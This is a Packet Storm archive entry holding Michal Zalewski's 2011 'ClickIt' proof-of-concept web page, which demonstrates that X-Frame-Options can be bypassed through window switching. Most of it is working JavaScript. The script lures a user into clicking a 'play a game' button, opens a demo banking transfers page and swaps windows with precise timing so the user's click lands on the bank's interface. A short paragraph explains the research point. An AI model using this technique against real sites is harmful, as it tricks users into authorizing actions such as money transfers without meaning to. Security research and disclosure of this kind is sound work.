ClickIt Proof Of Concept

2011-12-13T00:00:00
ID PACKETSTORM:107787
Type packetstorm
Reporter Michal Zalewski
Modified 2011-12-13T00:00:00

Description

                                        
                                            `<h3><i>X-Frame-Options</i> is worth less than you think</h3>  
  
<script>  
var w;  
var dummy;  
var it;  
  
// Precache stuff.  
  
x = new Image();  
x.src = 'http://banking.beaver-peak.us/banking_interface/transfers/';  
  
x2 = new Image();  
x2.src = 'http://banking.beaver-peak.us/banking_interface/transfers/beaver-peak.jpg';  
  
x3 = new Image();  
x3.src = 'http://lcamtuf.coredump.cx/clickit/win.html';  
  
x4 = new Image();  
x4.src = 'http://lcamtuf.coredump.cx/clickit/win.jpg';  
  
function prepare() {  
w = open('http://banking.beaver-peak.us/banking_interface/transfers/','_blank');  
setTimeout(complete, 300);  
}  
  
function complete() {  
w.location.href = 'http://lcamtuf.coredump.cx/clickit/attacker.html';  
setTimeout(goback, 1000);  
}  
  
function goback() {  
try {  
if (w.document.body.innerHTML == undefined) throw 1;  
setTimeout(goback, 100);  
} catch (e) {  
// That one case where prompts.tab_modal.enabled=true would have helped in Firefox...  
if (navigator.userAgent.indexOf('Firefox/') != -1)  
setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 1500);  
else  
setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 500);  
}  
}  
  
</script>  
<p>  
JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as  
window positioning, <code>history.forward()</code> and <code>history.back()</code>, open some  
scary possibilities that we are <a href="http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html">completely unprepared to deal with</a>.  
This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to  
conceal its operation, the transitions <a href="http://lcamtuf.coredump.cx/switch/">can be made seamless</a> and very  
difficult to perceive. Very accurate click prediction can be achieved by carefully measuring  
mouse velocity and distance to destination, too.  
  
<p>  
I discuss these attacks and many other unsolved challenges in web app design in  
<i><a href="http://lcamtuf.coredump.cx/tangled/">"The Tangled Web"</a></i>.  
A similar approach poses a problem with many browser UIs; for that,   
<a href="http://lcamtuf.blogspot.com/2010/08/on-designing-uis-for-non-robots.html">check out this post</a>.  
<p>  
<input type=submit value="Click here to play a game" onclick="prepare()">  
  
  
`